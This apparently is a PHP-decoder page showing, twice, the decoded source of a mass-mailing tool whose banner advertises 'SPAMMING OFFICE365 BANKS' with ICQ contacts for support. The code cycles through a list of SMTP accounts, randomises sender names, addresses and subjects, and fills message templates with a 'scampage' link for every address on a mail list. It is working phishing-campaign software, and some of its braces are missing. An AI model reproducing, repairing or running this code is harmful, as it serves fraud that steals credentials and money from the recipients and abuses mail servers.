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PHP Decode
<?php require_once("Set/phpmailer/PHPMailerAutoload.php"); include('Set/
Decoded Output download
echo " \e[0m\e[1;91m \e[0m
echo " \e[0m\e[1;36m \e[0m
echo " \e[0m\e[1;36m \e[0m
echo " \e[0m\e[1;36m \e[0m
echo " \e[0m\e[1;36m \e[0m
echo " \e[0m\e[1;36m \e[0m
echo " \e[0m\e[1;36m \e[0m
echo " \e[0m\e[1;92m V4.2 From The killer \e[0m
echo " \e[0m\e[1;91m \e[0m
echo "
echo "\e[1;32m \e[1;91m
echo "\e[1;32m \e[1;33m The killer V4.2 - SPAMMING OFFICE365 BANKS\e[1;32m \e[0m
echo "\e[1;32m \e[1;36m Communicate with support directly \e[1;32m \e[0m
echo "\e[1;32m \e[1;91m ICQ : \e[1; 37m770675088\e[1;32m \e[0m
echo "\e[1;32m \e[1;92m Key killer : KUBCDSJDvATkWLZefHgGzyi \e[1;37m\e[1;32m \e[0m
echo "\e[1;32m \e[1;32m
echo "\e[1;32m
echo "
function Kirim($email, $smtp_acc, $gx_setup)
$smtp = new SMTP;
$smtp->do_debug = 0;
$smtpserver = $smtp_acc['host'];
$smtpport = $smtp_acc['port'];
$smtpuser = $smtp_acc['username'];
$smtppass = $smtp_acc['password'];
$priority = $gx_setup['priority'];
$userandom = $gx_setup['userandom'];
$sleeptime = $gx_setup['sleeptime'];
$replacement = $gx_setup['replacement'];
$userremoveline = $gx_setup['userremoveline'];
$fromname = $gx_setup['fromname'];
$frommail = $gx_setup['frommail'];
$subject = $gx_setup['subject'];
$msgfile = $gx_setup['msgfile'];
$filepdf = $gx_setup['filesend'];
$randurl = $gx_setup['scampage'];
if (!$smtp->connect($smtpserver, $smtpport)) {
throw new Exception('Connect failed');
//Say hello
if (!$smtp->hello(gethostname())) {
throw new Exception('EHLO failed: ' . $smtp->getError()['error']);
$e = $smtp->getServerExtList();
if (array_key_exists('STARTTLS', $e)) {
$tlsok = $smtp->startTLS();
if (!$tlsok) {
throw new Exception('Failed to start encryption: ' . $smtp->getError()['error']);
if (!$smtp->hello(gethostname())) {
throw new Exception('EHLO (2) failed: ' . $smtp->getError()['error']);
$e = $smtp->getServerExtList();
if (array_key_exists('AUTH', $e)) {
if ($smtp->authenticate($smtpuser, $smtppass)) {
$mail = new PHPMailer;
$mail->Encoding = 'base64'; // 8bit base64 multipart/alternative quoted-printable
$mail->CharSet = 'UTF-8';
$mail->headerLine("format", "flowed");
/* Smtp connect */
//$mail->addCustomHeader('X-Ebay-Mailtracker', '11400.000.0.0.df812eaca5dd4ebb8aa71380465a8e74');
$mail->SMTPAuth = true;
$mail->Host = $smtpserver;
$mail->Port = $smtpport;
$mail->Priority = $priority;
$mail->Username = $smtpuser;
$mail->Password = $smtppass;
if ($userandom == 1) {
$rand = rand(1, 50);
$fromname = randName($rand);
$frommail = randMail($rand);
$subject = randSubject($rand);
if ($gx_setup['filesend'] == 0) {
$filepdf = file_get_contents($AddAttachment);
$asu = RandString1(8);
$asu1 = RandString(5);
$asu2 = RandString1(5);
$nmbr = RandNumber(5);
$fromnames = str_replace('##randstring##', $asu1, $fromname);
$frommails = str_replace('##randstring##', $asu, $frommail);
$subjects = str_replace('##randstring##', $asu2, $subject);
$mail->setFrom($frommails, $fromnames);
$mail->Subject = $subjects;
if ($replacement == 1) {
$msg = lettering($msgfile, $email, $frommail, $fromname, $randurl, $subject);
} else {
$msg = file_get_contents($msgfile);
if (!$mail->send()) {
echo "SMTP Error : " . $mail->ErrorInfo;
} else {
echo "\e[0m\e[1;91m[ \e[1;32m CLAY SENDER V4.2 \e[0m\e[1;91m]
echo "\e[0;37m \e[1;32m
echo "\e[1;36m \e[1;33mDATE \e[0;37m : \e[1;33m";
echo date('h:i:s A');
echo "\e[1;34m
echo "\e[1;36m \e[1;33mName Send\e[0m :\e[1;36m $fromname\e[0m
echo "\e[1;36m \e[1;33mTo Mail \e[0m :\e[1;91m $email\e[0m
echo "\e[1;36m \e[1;33mStatus\e[0m : \e[1;32mSuccess!\e[0m
echo "\e[0;37m \e[1;32m
echo "\e[0m\e[1;91m[ \e[1;32m ICQ : 749235477 \e[0m\e[1;91m ]
} else {
throw new Exception('Authentication failed: ' . $smtp->getError()['error']);
$file = file_get_contents($gx_setup['mail_list']);
if ($file) {
$ext = preg_split('/
?/', $file);
echo " \e[1;91m\e[1;91m
echo "\e[0;91m[\e[1;33m\e[1;4mThe killer V4.2 ]\e[0;91m\e[0m";
echo "
echo "
$smtp_key = 0;
foreach ($ext as $num => $email) {
if ($smtp_key == count($smtp_acc)) {
$smtp_key = 0;
Kirim($email, $smtp_acc[$smtp_key], $gx_setup);
if ($gx_setup['userremoveline'] == 1) {
$remove = Removeline($mailist, $email);
Did this file decode correctly?
Original Code
echo " \e[0m\e[1;91m \e[0m\r\n";
echo " \e[0m\e[1;36m \e[0m\r\n";
echo " \e[0m\e[1;36m \e[0m\r\n";
echo " \e[0m\e[1;36m \e[0m\r\n";
echo " \e[0m\e[1;36m \e[0m\r\n";
echo " \e[0m\e[1;36m \e[0m\r\n";
echo " \e[0m\e[1;36m \e[0m\r\n";
echo " \e[0m\e[1;92m V4.2 From The killer \e[0m\r\n";
echo " \e[0m\e[1;91m \e[0m\r\n";
echo "\r\n";
echo "\e[1;32m \e[1;91m\r\n";
echo "\e[1;32m \e[1;33m The killer V4.2 - SPAMMING OFFICE365 BANKS\e[1;32m \e[0m\r\n";
echo "\e[1;32m \e[1;36m Communicate with support directly \e[1;32m \e[0m\r\n";
echo "\e[1;32m \e[1;91m ICQ : \e[1; 37m770675088\e[1;32m \e[0m\r\n";
echo "\e[1;32m \e[1;92m Key killer : KUBCDSJDvATkWLZefHgGzyi \e[1;37m\e[1;32m \e[0m\r\n";
echo "\e[1;32m \e[1;32m\r\n";
echo "\e[1;32m \r\n";
echo "\r\n";
function Kirim($email, $smtp_acc, $gx_setup)
$smtp = new SMTP;
$smtp->do_debug = 0;
$smtpserver = $smtp_acc['host'];
$smtpport = $smtp_acc['port'];
$smtpuser = $smtp_acc['username'];
$smtppass = $smtp_acc['password'];
$priority = $gx_setup['priority'];
$userandom = $gx_setup['userandom'];
$sleeptime = $gx_setup['sleeptime'];
$replacement = $gx_setup['replacement'];
$userremoveline = $gx_setup['userremoveline'];
$fromname = $gx_setup['fromname'];
$frommail = $gx_setup['frommail'];
$subject = $gx_setup['subject'];
$msgfile = $gx_setup['msgfile'];
$filepdf = $gx_setup['filesend'];
$randurl = $gx_setup['scampage'];
if (!$smtp->connect($smtpserver, $smtpport)) {
throw new Exception('Connect failed');
//Say hello
if (!$smtp->hello(gethostname())) {
throw new Exception('EHLO failed: ' . $smtp->getError()['error']);
$e = $smtp->getServerExtList();
if (array_key_exists('STARTTLS', $e)) {
$tlsok = $smtp->startTLS();
if (!$tlsok) {
throw new Exception('Failed to start encryption: ' . $smtp->getError()['error']);
if (!$smtp->hello(gethostname())) {
throw new Exception('EHLO (2) failed: ' . $smtp->getError()['error']);
$e = $smtp->getServerExtList();
if (array_key_exists('AUTH', $e)) {
if ($smtp->authenticate($smtpuser, $smtppass)) {
$mail = new PHPMailer;
$mail->Encoding = 'base64'; // 8bit base64 multipart/alternative quoted-printable
$mail->CharSet = 'UTF-8';
$mail->headerLine("format", "flowed");
/* Smtp connect */
//$mail->addCustomHeader('X-Ebay-Mailtracker', '11400.000.0.0.df812eaca5dd4ebb8aa71380465a8e74');
$mail->SMTPAuth = true;
$mail->Host = $smtpserver;
$mail->Port = $smtpport;
$mail->Priority = $priority;
$mail->Username = $smtpuser;
$mail->Password = $smtppass;
if ($userandom == 1) {
$rand = rand(1, 50);
$fromname = randName($rand);
$frommail = randMail($rand);
$subject = randSubject($rand);
if ($gx_setup['filesend'] == 0) {
$filepdf = file_get_contents($AddAttachment);
$asu = RandString1(8);
$asu1 = RandString(5);
$asu2 = RandString1(5);
$nmbr = RandNumber(5);
$fromnames = str_replace('##randstring##', $asu1, $fromname);
$frommails = str_replace('##randstring##', $asu, $frommail);
$subjects = str_replace('##randstring##', $asu2, $subject);
$mail->setFrom($frommails, $fromnames);
$mail->Subject = $subjects;
if ($replacement == 1) {
$msg = lettering($msgfile, $email, $frommail, $fromname, $randurl, $subject);
} else {
$msg = file_get_contents($msgfile);
if (!$mail->send()) {
echo "SMTP Error : " . $mail->ErrorInfo;
} else {
echo "\e[0m\e[1;91m[ \e[1;32m CLAY SENDER V4.2 \e[0m\e[1;91m] \r\n";
echo "\e[0;37m \e[1;32m\r\n";
echo "\e[1;36m \e[1;33mDATE \e[0;37m : \e[1;33m";
echo date('h:i:s A');
echo "\e[1;34m \r\n";
echo "\e[1;36m \e[1;33mName Send\e[0m :\e[1;36m $fromname\e[0m\n";
echo "\e[1;36m \e[1;33mTo Mail \e[0m :\e[1;91m $email\e[0m\r\n";
echo "\e[1;36m \e[1;33mStatus\e[0m : \e[1;32mSuccess!\e[0m\n";
echo "\e[0;37m \e[1;32m\r\n";
echo "\e[0m\e[1;91m[ \e[1;32m ICQ : 749235477 \e[0m\e[1;91m ] \r\n";
} else {
throw new Exception('Authentication failed: ' . $smtp->getError()['error']);
$file = file_get_contents($gx_setup['mail_list']);
if ($file) {
$ext = preg_split('/\n|\r\n?/', $file);
echo " \e[1;91m\e[1;91m \r\n";
echo "\e[0;91m[\e[1;33m\e[1;4mThe killer V4.2 ]\e[0;91m\e[0m";
echo "\r\n";
echo "\n";
$smtp_key = 0;
foreach ($ext as $num => $email) {
if ($smtp_key == count($smtp_acc)) {
$smtp_key = 0;
Kirim($email, $smtp_acc[$smtp_key], $gx_setup);
if ($gx_setup['userremoveline'] == 1) {
$remove = Removeline($mailist, $email);
Function Calls
None |
MD5 | f06c956ab1675822dfa2ad5fcf7fb37c |
Eval Count | 0 |
Decode Time | 82 ms |